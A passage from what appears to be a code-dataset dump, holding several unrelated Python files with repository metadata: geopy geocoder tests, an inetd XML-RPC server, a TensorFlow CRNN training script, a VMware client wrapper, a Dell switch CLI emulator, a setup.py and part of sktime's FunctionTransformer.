{"query": "nyc"},
{"latitude": 40.71455, "longitude": -74.00712},
)
def test_unicode_name(self):
"""
YahooPlaceFinder.geocode unicode
"""
self.geocode_run(
{"query": u("\u6545\u5bab")},
{"latitude": 39.916, "longitude": 116.390},
)
def test_reverse_string(self):
"""
YahooPlaceFinder.reverse string
"""
self.reverse_run(
{"query": "40.75376406311989, -73.98489005863667"},
{"latitude": 40.75376406311989, "longitude": -73.98489005863667}
)
def test_reverse_point(self):
"""
YahooPlaceFinder.reverse Point
"""
self.reverse_run(
{"query": Point(40.75376406311989, -73.98489005863667)},
{"latitude": 40.75376406311989, "longitude": -73.98489005863667}
)
def test_timezone(self):
"""
YahooPlacefinder.with_timezone
"""
self.geocode_run(
{"query": "nyc", "with_timezone": True},
{"latitude": 40.71455, "longitude": -74.00712},
)
| 28.371795
| 87
| 0.598735
| 1,857
| 0.839132
| 0
| 0
| 1,655
| 0.747854
| 0
| 0
| 749
| 0.338455
|
fbf1cd1a479f1f30a64fa316deccf90f2fde6080
| 1,151
|
py
|
Python
|
inetdxmlrpc.py
|
Leonidas-from-XIV/sandbox
|
ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50
|
[
"WTFPL"
] | null | null | null |
inetdxmlrpc.py
|
Leonidas-from-XIV/sandbox
|
ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50
|
[
"WTFPL"
] | null | null | null |
inetdxmlrpc.py
|
Leonidas-from-XIV/sandbox
|
ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50
|
[
"WTFPL"
] | null | null | null |
#!/usr/bin/env python2.4
# -*- encoding: latin-1 -*-
"""A small XML-RPC Server running under control
of the internet superserver inetd.
Configuring:
Add this line to your inetd.conf
embedxmlrpc stream tcp nowait user /usr/sbin/tcpd inetdxmlrpc.py
Where user is the user to execute the script and
inetdxmlprc.py the path to the script.
and this line to your services.conf
embedxmlrpc 7373/tcp # standalone XML-RPC server
there 7373 will be the port
You have to restart your inetd.
"""
import sys, xmlrpclib
def sumAndDifference(a, b):
return a + b
funcs = {"sumAndDifference": sumAndDifference}
def inetdcall():
while True:
line = sys.stdin.readline().splitlines()[0]
if "Content-Length:" in line:
cl = line.split()[1]
cl = int(cl)
sys.stdin.readline()
break
request = sys.stdin.read(cl)
params, method = xmlrpclib.loads(request)
result = funcs[method](*params)
response = xmlrpclib.dumps((result,), methodresponse=True)
sys.stdout.write(response)
if __name__ == '__main__':
inetdcall()
| 25.577778
| 77
| 0.645526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 570
| 0.495222
|
fbf23a32edea1c76b286e1eb5b7cddd3cfc77494
| 17,504
|
py
|
Python
|
examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py
|
soar-zhengjian/uai-sdk
|
e195bd3fb2b97aca7dac6722d332c25b7070481f
|
[
"Apache-2.0"
] | 38
|
2017-04-26T04:00:09.000Z
|
2022-02-10T02:51:05.000Z
|
examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py
|
soar-zhengjian/uai-sdk
|
e195bd3fb2b97aca7dac6722d332c25b7070481f
|
[
"Apache-2.0"
] | 17
|
2017-11-20T20:47:09.000Z
|
2022-02-09T23:48:46.000Z
|
examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py
|
soar-zhengjian/uai-sdk
|
e195bd3fb2b97aca7dac6722d332c25b7070481f
|
[
"Apache-2.0"
] | 28
|
2017-07-08T05:23:13.000Z
|
2020-08-18T03:12:27.000Z
|
"""
Train shadow net script
"""
import argparse
import functools
import itertools
import os
import os.path as ops
import sys
import time
import numpy as np
import tensorflow as tf
import pprint
import shadownet
import six
from six.moves import xrange # pylint: disable=redefined-builtin
sys.path.append('/data/')
from crnn_model import crnn_model
from local_utils import data_utils, log_utils, tensorboard_vis_summary
from global_configuration import config
from uaitrain.arch.tensorflow import uflag
from typing import List
from tensorflow.core.framework import node_def_pb2
from tensorflow.python.framework import device as pydev
from tensorflow.python.training import device_setter
tf.app.flags.DEFINE_string('dataset_dir','/data/data/tfrecords','data path')
tf.app.flags.DEFINE_string('weights_path',None,'weight path')
FLAGS = tf.app.flags.FLAGS
logger = log_utils.init_logger()
def local_device_setter(num_devices=1,
ps_device_type='cpu',
worker_device='/cpu:0',
ps_ops=None,
ps_strategy=None):
if ps_ops == None:
ps_ops = ['Variable', 'VariableV2', 'VarHandleOp']
if ps_strategy is None:
ps_strategy = device_setter._RoundRobinStrategy(num_devices)
if not six.callable(ps_strategy):
raise TypeError("ps_strategy must be callable")
def _local_device_chooser(op):
current_device = pydev.DeviceSpec.from_string(op.device or "")
node_def = op if isinstance(op, node_def_pb2.NodeDef) else op.node_def
if node_def.op in ps_ops:
ps_device_spec = pydev.DeviceSpec.from_string(
'/{}:{}'.format(ps_device_type, ps_strategy(op)))
ps_device_spec.merge_from(current_device)
return ps_device_spec.to_string()
else:
worker_device_spec = pydev.DeviceSpec.from_string(worker_device or "")
worker_device_spec.merge_from(current_device)
return worker_device_spec.to_string()
return _local_device_chooser
def get_words_from_chars(characters_list: List[str], sequence_lengths: List[int], name='chars_conversion'):
with tf.name_scope(name=name):
def join_charcaters_fn(coords):
return tf.reduce_join(characters_list[coords[0]:coords[1]])
def coords_several_sequences():
end_coords = tf.cumsum(sequence_lengths)
start_coords = tf.concat([[0], end_coords[:-1]], axis=0)
coords = tf.stack([start_coords, end_coords], axis=1)
coords = tf.cast(coords, dtype=tf.int32)
return tf.map_fn(join_charcaters_fn, coords, dtype=tf.string)
def coords_single_sequence():
return tf.reduce_join(characters_list, keep_dims=True)
words = tf.cond(tf.shape(sequence_lengths)[0] > 1,
true_fn=lambda: coords_several_sequences(),
false_fn=lambda: coords_single_sequence())
return words
def get_shadownet_fn(num_gpus, variable_strategy, num_workers):
"""Returns a function that will build shadownet model."""
def _shadownet_fun(features, labels, mode, params):
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
tower_features = features
tower_labels = labels
tower_losses = []
tower_gradvars = []
tower_preds = []
tower_tensor_dict = []
tower_seq_len = []
num_devices = num_gpus
device_type = 'gpu'
tower_batch_size = int(params.batch_size / num_devices)
for i in range(num_devices):
worker_device = '/{}:{}'.format(device_type, i)
device_setter = local_device_setter(worker_device=worker_device)
with tf.variable_scope('shadownet', reuse=bool(i != 0)):
with tf.name_scope('tower_%d' % i) as name_scope:
with tf.device(device_setter):
loss, gradvars, preds, tensor_dict, seq_len = _tower_fn(
is_training, tower_features[i], tower_labels[i], tower_batch_size, params.l_size)
tower_losses.append(loss)
tower_gradvars.append(gradvars)
tower_preds.append(preds)
tower_tensor_dict.append(tensor_dict)
tower_seq_len.append(seq_len)
if i == 0:
# Only trigger batch_norm moving mean and variance update from
# the 1st tower. Ideally, we should grab the updates from all
# towers but these stats accumulate extremely fast so we can
# ignore the other stats from the other towers without
# significant detriment.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS,
name_scope)
# Now compute global loss and gradients.
gradvars = []
with tf.name_scope('gradient_averaging'):
all_grads = {}
for grad, var in itertools.chain(*tower_gradvars):
if grad is not None:
all_grads.setdefault(var, []).append(grad)
for var, grads in six.iteritems(all_grads):
# Average gradients on the same device as the variables
with tf.device(var.device):
if len(grads) == 1:
avg_grad = grads[0]
else:
avg_grad = tf.multiply(tf.add_n(grads), 1. / len(grads))
gradvars.append((avg_grad, var))
# Device that runs the ops to apply global gradient updates.
consolidation_device = '/gpu:0' if variable_strategy == 'GPU' else '/cpu:0'
with tf.device(consolidation_device):
global_step = tf.train.get_global_step()
starter_learning_rate = params.learning_rate
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
params.decay_steps, params.decay_rate,
staircase=True)
loss = tf.reduce_mean(tower_losses, name='loss')
decoded, log_prob = tf.nn.ctc_beam_search_decoder(tower_preds[0],
tower_seq_len[0]*np.ones(tower_batch_size),
merge_repeated=False)
sequence_dist = tf.reduce_mean(tf.edit_distance(tf.cast(decoded[0], tf.int32), tower_labels[0]))
sequence_lengths_pred = tf.bincount(tf.cast(decoded[0].indices[:, 0], tf.int32),
minlength=tf.shape(tower_labels[0])[1])
label_lengths_pred = tf.bincount(tf.cast(labels[0].indices[:, 0], tf.int32),
minlength=tf.shape(tower_labels[0])[1])
tensors_to_log = {'global_step': global_step, 'learning_rate': learning_rate, 'loss': loss}
dist_to_log = {'global_step': global_step,
'learning_rate': learning_rate,
'loss': loss,
'train_seq_dist': sequence_dist,
'sequence_lengths_pred': sequence_lengths_pred,
'label_lengths_pred': label_lengths_pred}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=10)
dist_hook = tf.train.LoggingTensorHook(
tensors=dist_to_log, every_n_iter=1000)
train_hooks = [logging_hook, dist_hook]
seq_dist_sum = tf.summary.scalar(name='Seq_Dist', tensor=sequence_dist)
lr_sum = tf.summary.scalar(name='Learning_rate', tensor=learning_rate)
summaries = [seq_dist_sum, lr_sum]
summary_hook = tf.train.SummarySaverHook(
save_steps=1000,
output_dir='/data/output/',
summary_op=summaries)
optimizer = tf.train.AdadeltaOptimizer(learning_rate=learning_rate)
if params.sync:
optimizer = tf.train.SyncReplicasOptimizer(
optimizer, replicas_to_aggregate=num_workers)
sync_replicas_hook = optimizer.make_session_run_hook(params.is_chief)
train_hooks.append(sync_replicas_hook)
# Create single grouped train op
train_op = [
optimizer.apply_gradients(
gradvars, global_step=tf.train.get_global_step())
]
train_op.extend(update_ops)
train_op = tf.group(*train_op)
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
training_hooks=train_hooks)
return _shadownet_fun
def _tower_fn(is_training, feature, label, batch_size, l_size):
seq_len=l_size
shadownet = crnn_model.ShadowNet(phase='Train', hidden_nums=256, layers_nums=2, seq_length=seq_len,
num_classes=config.cfg.TRAIN.CLASSES_NUMS, rnn_cell_type='lstm')
imgs = tf.image.resize_images(feature, (32, l_size*4), method=0)
input_imgs = tf.cast(x=imgs, dtype=tf.float32)
with tf.variable_scope('shadow', reuse=False):
net_out, tensor_dict = shadownet.build_shadownet(inputdata=input_imgs)
cost = tf.reduce_mean(tf.nn.ctc_loss(labels=label, inputs=net_out,
sequence_length=seq_len*np.ones(batch_size)))
#lstm l2 normalization loss
lstm_tv = tf.trainable_variables(scope='LSTMLayers')
r_lambda = 0.001
regularization_cost = r_lambda * tf.reduce_sum([tf.nn.l2_loss(v) for v in lstm_tv])
cost = cost + regularization_cost
model_params = tf.trainable_variables()
tower_grad = tf.gradients(cost, model_params)
return cost, zip(tower_grad, model_params), net_out, tensor_dict, seq_len
def input_fn(data_dir,
subset,
num_shards,
batch_size,
use_distortion_for_training=True):
"""Create input graph for model.
Args:
data_dir: Directory where TFRecords representing the dataset are located.
subset: one of 'train', 'validate' and 'eval'.
num_shards: num of towers participating in data-parallel training.
batch_size: total batch size for training to be divided by the number of
shards.
use_distortion_for_training: True to use distortions.
Returns:
three
"""
with tf.device('/cpu:0'):
use_distortion = subset == 'train' and use_distortion_for_training
dataset = shadownet.ShadownetDataSet(data_dir, subset, use_distortion)
inputdata, input_labels = dataset.make_batch(batch_size)
if num_shards <= 1:
# No GPU available or only 1 GPU.
num_shards = 1
feature_shards = tf.split(inputdata, num_shards)
label_shards = tf.sparse_split(sp_input=input_labels, num_split=num_shards, axis=0)
return feature_shards, label_shards
def get_experiment_fn(data_dir,
num_gpus,
use_distortion_for_training=True):
def _experiment_fn(run_config, hparams):
"""Returns an Experiment."""
# Create estimator.
train_input_fn = functools.partial(
input_fn,
data_dir,
subset='train',
num_shards=num_gpus,
batch_size=hparams.batch_size,
use_distortion_for_training=use_distortion_for_training)
eval_input_fn = functools.partial(
input_fn,
data_dir,
subset='validation',
batch_size=hparams.batch_size,
num_shards=num_gpus)
train_steps = hparams.steps
eval_steps = 2048 // hparams.batch_size
variable_strategy = 'CPU'
classifier = tf.estimator.Estimator(
model_fn=get_shadownet_fn(num_gpus,
variable_strategy,
run_config.num_worker_replicas or 1),
config=run_config,
params=hparams)
# Create experiment.
return tf.contrib.learn.Experiment(
classifier,
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
train_steps=train_steps,
eval_steps=eval_steps,
min_eval_frequency=100)
return _experiment_fn
def main(num_gpus, log_device_placement, num_intra_threads, data_dir, output_dir, tfrecord_dir, **hparams):
# The env variable is on deprecation path, default is set to off.
os.environ['TF_SYNC_ON_FINISH'] = '0'
os.environ['TF_ENABLE_WINOGRAD_NONFUSED'] = '1'
data_dir = os.path.join(data_dir, tfrecord_dir)
# Session configuration.
sess_config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=log_device_placement,
intra_op_parallelism_threads=num_intra_threads,
gpu_options=tf.GPUOptions(force_gpu_compatible=True))
config = tf.contrib.learn.RunConfig(session_config=sess_config, model_dir=output_dir)
tf.contrib.learn.learn_runner.run(
get_experiment_fn(data_dir, num_gpus),
run_config=config,
hparams=tf.contrib.training.HParams(
is_chief=config.is_chief,
**hparams))
if __name__ == '__main__':
# init args
# args = init_args()
#if not ops.exists(args.dataset_dir):
# raise ValueError('{:s} doesn\'t exist'.format(args.dataset_dir))
#train_shadownet(args.dataset_dir, args.weights_path)
# if args.weights_path is not None and 'two_stage' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=False)
# elif args.weights_path is not None and 'cnnsub' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=True)
# else:
# train_shadownet(args.dataset_dir)
parser = argparse.ArgumentParser()
parser.add_argument(
'--num_gpus',
type=int,
default=1,
help='UAI-SDK related. The number of gpus used.')
parser.add_argument(
'--log-device-placement',
action='store_true',
default=False,
help='Whether to log device placement.')
parser.add_argument(
'--num-intra-threads',
type=int,
default=0,
help="""\
Number of threads to use for intra-op parallelism. When training on CPU
set to 0 to have the system pick the appropriate number or alternatively
set it to the number of physical CPU cores.\
""")
parser.add_argument(
'--num-inter-threads',
type=int,
default=0,
help="""\
Number of threads to use for inter-op parallelism. If set to 0, the
system will pick an appropriate number.\
""")
parser.add_argument(
'--sync',
action='store_true',
default=False,
help="""\
If present when running in a distributed environment will run on sync mode.\
""")
parser.add_argument(
'--work_dir',
type=str,
default='/data/',
help='UAI SDK related.')
parser.add_argument(
'--data_dir',
type=str,
required=True,
help='UAI-SDK related. The directory where the CIFAR-10 input data is stored.')
parser.add_argument(
'--output_dir',
type=str,
required=True,
help='UAI-SDK related. The directory where the model will be stored.')
parser.add_argument(
'--log_dir',
type=str,
default='/data/data/',
help='UAI SDK related.')
parser.add_argument(
'--l_size',
type=int,
default=10,
help="""l_batch_label, how many labels CNN net work will output into LSTM""")
parser.add_argument(
'--learning_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_steps',
type=int,
default=40000)
parser.add_argument(
'--steps',
type=int,
default=200000)
parser.add_argument(
'--batch_size',
type=int,
default=512)
parser.add_argument(
'--tfrecord_dir',
type=str,
default='tfrecords')
args = parser.parse_args()
main(**vars(args))
print('Done')
| 40.424942
| 159
| 0.584324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,428
| 0.195841
|
fbf29fa665c3f19650fb43d520ce03961090f743
| 7,007
|
py
|
Python
|
ovs/extensions/hypervisor/hypervisors/vmware.py
|
mflu/openvstorage_centos
|
280a98d3e5d212d58297e0ffcecd325dfecef0f8
|
[
"Apache-2.0"
] | 1
|
2015-08-29T16:36:40.000Z
|
2015-08-29T16:36:40.000Z
|
ovs/extensions/hypervisor/hypervisors/vmware.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
ovs/extensions/hypervisor/hypervisors/vmware.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module for the VMware hypervisor client
"""
import os
from ovs.extensions.hypervisor.apis.vmware.sdk import Sdk
class VMware(object):
"""
Represents the hypervisor client for VMware
"""
def __init__(self, ip, username, password):
"""
Initializes the object with credentials and connection information
"""
self.sdk = Sdk(ip, username, password)
self.state_mapping = {'poweredOn' : 'RUNNING',
'poweredOff': 'HALTED',
'suspended' : 'PAUSED'}
def get_state(self, vmid):
"""
Get the current power state of a virtual machine
@param vmid: hypervisor id of the virtual machine
"""
return self.state_mapping[self.sdk.get_power_state(vmid)]
def create_vm_from_template(self, name, source_vm, disks, ip, mountpoint, wait=True):
"""
Create a new vmachine from an existing template
"""
task = self.sdk.create_vm_from_template(name, source_vm, disks, ip, mountpoint, wait)
if wait is True:
if self.sdk.validate_result(task):
task_info = self.sdk.get_task_info(task)
return task_info.info.result.value
return None
def clone_vm(self, vmid, name, disks, wait=False):
"""
Clone a vmachine
@param vmid: hypervisor id of the virtual machine
@param name: name of the virtual machine
@param disks: list of disk information
@param wait: wait for action to complete
"""
task = self.sdk.clone_vm(vmid, name, disks, wait)
if wait is True:
if self.sdk.validate_result(task):
task_info = self.sdk.get_task_info(task)
return task_info.info.result.value
return None
def delete_vm(self, vmid, storagedriver_mountpoint, storagedriver_storage_ip, devicename, disks_info=None, wait=False):
"""
Remove the vmachine from the hypervisor
@param vmid: hypervisor id of the virtual machine
@param wait: wait for action to complete
"""
if disks_info is None:
disks_info = []
_ = disks_info
self.sdk.delete_vm(vmid, storagedriver_mountpoint, storagedriver_storage_ip, devicename, wait)
def get_vm_object(self, vmid):
"""
Gets the VMware virtual machine object from VMware by its identifier
"""
return self.sdk.get_vm(vmid)
def get_vm_agnostic_object(self, vmid):
"""
Gets the VMware virtual machine object from VMware by its identifier
"""
return self.sdk.make_agnostic_config(self.sdk.get_vm(vmid))
def get_vm_object_by_devicename(self, devicename, ip, mountpoint):
"""
Gets the VMware virtual machine object from VMware by devicename
and datastore identifiers
"""
return self.sdk.make_agnostic_config(self.sdk.get_nfs_datastore_object(ip, mountpoint, devicename)[0])
def get_vms_by_nfs_mountinfo(self, ip, mountpoint):
"""
Gets a list of agnostic vm objects for a given ip and mountpoint
"""
for vm in self.sdk.get_vms(ip, mountpoint):
yield self.sdk.make_agnostic_config(vm)
def is_datastore_available(self, ip, mountpoint):
"""
@param ip : hypervisor ip to query for datastore presence
@param mountpoint: nfs mountpoint on hypervisor
@rtype: boolean
@return: True | False
"""
return self.sdk.is_datastore_available(ip, mountpoint)
def set_as_template(self, vmid, disks, wait=False):
"""
Configure a vm as template
This lets the machine exist on the hypervisor but configures
all disks as "Independent Non-persistent"
@param vmid: hypervisor id of the virtual machine
"""
return self.sdk.set_disk_mode(vmid, disks, 'independent_nonpersistent', wait)
def mount_nfs_datastore(self, name, remote_host, remote_path):
"""
Mounts a given NFS export as a datastore
"""
return self.sdk.mount_nfs_datastore(name, remote_host, remote_path)
def test_connection(self):
"""
Checks whether this node is a vCenter
"""
return self.sdk.test_connection()
def clean_backing_disk_filename(self, path):
"""
Cleans a backing disk filename to the corresponding disk filename
"""
_ = self
return path.replace('-flat.vmdk', '.vmdk').strip('/')
def get_backing_disk_path(self, machinename, devicename):
"""
Builds the path for the file backing a given device/disk
"""
_ = self
return '/{}/{}-flat.vmdk'.format(machinename.replace(' ', '_'), devicename)
def get_disk_path(self, machinename, devicename):
"""
Builds the path for the file backing a given device/disk
"""
_ = self
return '/{}/{}.vmdk'.format(machinename.replace(' ', '_'), devicename)
def clean_vmachine_filename(self, path):
"""
Cleans a VM filename
"""
_ = self
return path.strip('/')
def get_vmachine_path(self, machinename, storagerouter_machineid):
"""
Builds the path for the file representing a given vmachine
"""
_ = self, storagerouter_machineid # For compatibility purposes only
machinename = machinename.replace(' ', '_')
return '/{}/{}.vmx'.format(machinename, machinename)
def get_rename_scenario(self, old_name, new_name):
"""
Gets the rename scenario based on the old and new name
"""
_ = self
if old_name.endswith('.vmx') and new_name.endswith('.vmx'):
return 'RENAME'
elif old_name.endswith('.vmx~') and new_name.endswith('.vmx'):
return 'UPDATE'
return 'UNSUPPORTED'
def should_process(self, devicename, machine_ids=None):
"""
Checks whether a given device should be processed
"""
_ = self, devicename, machine_ids
return True
def file_exists(self, vpool, devicename):
"""
Check if devicename exists on the given vpool
"""
_ = self
filename = '/mnt/{0}/{1}'.format(vpool.name, devicename)
return os.path.exists(filename) and os.path.isfile(filename)
| 34.860697
| 123
| 0.628942
| 6,306
| 0.899957
| 252
| 0.035964
| 0
| 0
| 0
| 0
| 3,185
| 0.454545
|
fbf2ccc900304e6fa6940b6cc3e4418b5177231a
| 6,314
|
py
|
Python
|
fake_switches/dell10g/command_processor/config_interface.py
|
idjaw/fake-switches
|
9b481e17a26cca24bf3ef44466feebf9bff794f8
|
[
"Apache-2.0"
] | null | null | null |
fake_switches/dell10g/command_processor/config_interface.py
|
idjaw/fake-switches
|
9b481e17a26cca24bf3ef44466feebf9bff794f8
|
[
"Apache-2.0"
] | 1
|
2022-02-11T03:49:01.000Z
|
2022-02-11T03:49:01.000Z
|
fake_switches/dell10g/command_processor/config_interface.py
|
idjaw/fake-switches
|
9b481e17a26cca24bf3ef44466feebf9bff794f8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from fake_switches.dell.command_processor.config_interface import DellConfigInterfaceCommandProcessor, parse_vlan_list
from fake_switches.switch_configuration import AggregatedPort
class Dell10GConfigInterfaceCommandProcessor(DellConfigInterfaceCommandProcessor):
def __init__(self, switch_configuration, terminal_controller, logger,
piping_processor, port):
super(DellConfigInterfaceCommandProcessor, self).__init__(
switch_configuration, terminal_controller, logger, piping_processor,
port)
self.description_strip_chars = "\"'"
def get_prompt(self):
short_name = self.port.name.split(' ')[1]
return "{}(config-if-{}{})#".format(
self.switch_configuration.name,
"Po" if isinstance(self.port, AggregatedPort) else "Te",
short_name)
def configure_lldp_port(self, args, target_value):
if "transmit".startswith(args[0]):
self.port.lldp_transmit = target_value
elif "receive".startswith(args[0]):
self.port.lldp_receive = target_value
elif "med".startswith(args[0]):
if len(args) == 1:
self.port.lldp_med = target_value
elif "transmit-tlv".startswith(args[1]):
if "capabilities".startswith(args[2]):
self.port.lldp_med_transmit_capabilities = target_value
elif "network-policy".startswith(args[2]):
self.port.lldp_med_transmit_network_policy = target_value
def do_switchport(self, *args):
if "access".startswith(args[0]) and "vlan".startswith(args[1]):
self.set_access_vlan(int(args[2]))
elif "mode".startswith(args[0]):
self.set_switchport_mode(args[1])
elif ("general".startswith(args[0]) or "trunk".startswith(args[0])) and "allowed".startswith(args[1]):
if "vlan".startswith(args[2]) and args[0] == "general":
if len(args) > 5:
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
else:
operation = args[3]
vlan_range = args[4]
self.update_trunk_vlans(operation, vlan_range)
return
elif "vlan".startswith(args[2]) and args[0] == "trunk":
if len(args) > 5:
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
else:
if args[0:4] == ("trunk", "allowed", "vlan", "add"):
if self.port.trunk_vlans is not None:
self.port.trunk_vlans = sorted(list(set(self.port.trunk_vlans + parse_vlan_list(args[4]))))
elif args[0:4] == ("trunk", "allowed", "vlan", "remove"):
if self.port.trunk_vlans is None:
self.port.trunk_vlans = range(1, 4097)
for v in parse_vlan_list(args[4]):
if v in self.port.trunk_vlans:
self.port.trunk_vlans.remove(v)
if len(self.port.trunk_vlans) == 0:
self.port.trunk_vlans = None
elif args[0:4] == ("trunk", "allowed", "vlan", "none"):
self.port.trunk_vlans = []
elif args[0:4] == ("trunk", "allowed", "vlan", "all"):
self.port.trunk_vlans = None
elif args[0:3] == ("trunk", "allowed", "vlan"):
self.port.trunk_vlans = parse_vlan_list(args[3])
elif args[0:3] == ("trunk", "native", "vlan"):
self.port.trunk_native_vlan = int(args[3])
elif "general".startswith(args[0]) and "pvid".startswith(args[1]):
self.set_trunk_native_vlan(int(args[2]))
self.write_line("")
def do_no_switchport(self, *args):
if "mode".startswith(args[0]):
self.set_switchport_mode("access")
elif "access".startswith(args[0]):
if "vlan".startswith(args[1]):
self.print_vlan_warning()
self.port.access_vlan = None
elif args[0] in ("trunk", "general") and args[1:3] == ("allowed", "vlan"):
self.port.trunk_vlans = None
elif "general".startswith(args[0]):
if "pvid".startswith(args[1]):
self.port.trunk_native_vlan = None
self.write_line("")
def do_mtu(self, *args):
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
self.write_line("")
def do_no_mtu(self, *args):
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
self.write_line("")
def set_switchport_mode(self, mode):
if mode not in ("access", "trunk", "general"):
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
else:
self.port.mode = mode
def set_trunk_native_vlan(self, native_vlan):
vlan = self.switch_configuration.get_vlan(native_vlan)
if vlan is None:
self.write_line("Could not configure pvid.")
else:
self.port.trunk_native_vlan = vlan.number
def print_vlan_warning(self):
pass
| 46.77037
| 119
| 0.548939
| 5,556
| 0.879949
| 0
| 0
| 0
| 0
| 0
| 0
| 1,538
| 0.243586
|
fbf2e31cb815224097d8066fca9f33447d38f065
| 939
|
py
|
Python
|
setup.py
|
Spredzy/python-memsource
|
9624a1e93dab9cec874164fb390432c51ab0de31
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
Spredzy/python-memsource
|
9624a1e93dab9cec874164fb390432c51ab0de31
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
Spredzy/python-memsource
|
9624a1e93dab9cec874164fb390432c51ab0de31
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import setuptools
from memsource import version
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="memsource",
version=version.__version__,
author="Yanis Guenane",
author_email="yguenane+opensource@gmail.com",
description="Python bindings for Memsource",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Spredzy/python-memsource",
packages=setuptools.find_packages(),
install_requires=[
"requests"
],
classifiers=[
"Programming Language :: Python :: 3",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX :: Linux",
],
python_requires=">=3.6",
)
| 27.617647
| 61
| 0.664537
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 434
| 0.462194
|
fbf375a6746c12699f7672902496fe49ba8773ae
| 5,637
|
py
|
Python
|
sktime/transformations/series/func_transform.py
|
marcio55afr/sktime
|
25ba2f470f037366ca6b0e529137d3d0a6191e2e
|
[
"BSD-3-Clause"
] | 2
|
2021-12-28T10:48:11.000Z
|
2022-03-06T18:08:01.000Z
|
sktime/transformations/series/func_transform.py
|
marcio55afr/sktime
|
25ba2f470f037366ca6b0e529137d3d0a6191e2e
|
[
"BSD-3-Clause"
] | 2
|
2021-04-19T17:38:33.000Z
|
2021-07-25T18:44:10.000Z
|
sktime/transformations/series/func_transform.py
|
marcio55afr/sktime
|
25ba2f470f037366ca6b0e529137d3d0a6191e2e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
"""Implements FunctionTransformer, a class to create custom transformers."""
__author__ = ["Bouke Postma"]
__all__ = ["FunctionTransformer"]
import numpy as np
from sktime.transformations.base import _SeriesToSeriesTransformer
from sktime.utils.validation.series import check_series
def _identity(X):
"""Return X."""
return X
class FunctionTransformer(_SeriesToSeriesTransformer):
r"""Constructs a transformer from an arbitrary callable.
A FunctionTransformer forwards its y (and optionally X) arguments to a
user-defined function or function object and returns the result of this
function. This is useful for stateless transformations such as taking the
log of frequencies, doing custom scaling, etc.
Note: If a lambda is used as the function, then the resulting
transformer will not be pickleable.
Parameters
----------
func : callable, default=None
The callable to use for the transformation. This will be passed
the same arguments as transform, with args and kwargs forwarded.
If func is None, then func will be the identity function.
inverse_func : callable, default=None
The callable to use for the inverse transformation. This will be
passed the same arguments as inverse transform, with args and
kwargs forwarded. If inverse_func is None, then inverse_func
will be the identity function.
check_inverse : bool, default=True
Whether to check that or ``func`` followed by ``inverse_func`` leads to
the original inputs. It can be used for a sanity check, raising a
warning when the condition is not fulfilled.
kw_args : dict, default=None
Dictionary of additional keyword arguments to pass to func.
inv_kw_args : dict, default=None
Dictionary of additional keyword arguments to pass to inverse_func.
See Also
--------
sktime.transformations.series.boxcox.LogTransformer :
Transformer input data using natural log. Can help normalize data and
compress variance of the series.
sktime.transformations.series.exponent.ExponentTransformer :
Transform input data by raising it to an exponent. Can help compress
variance of series if a fractional exponent is supplied.
sktime.transformations.series.exponent.SqrtTransformer :
Transform input data by taking its square root. Can help compress
variance of input series.
Examples
--------
>>> import numpy as np
>>> from sktime.transformations.series.func_transform import FunctionTransformer
>>> transformer = FunctionTransformer(np.log1p, np.expm1)
>>> X = np.array([[0, 1], [2, 3]])
>>> transformer.fit_transform(X)
array([[0. , 0.69314718],
[1.09861229, 1.38629436]])
"""
_tags = {
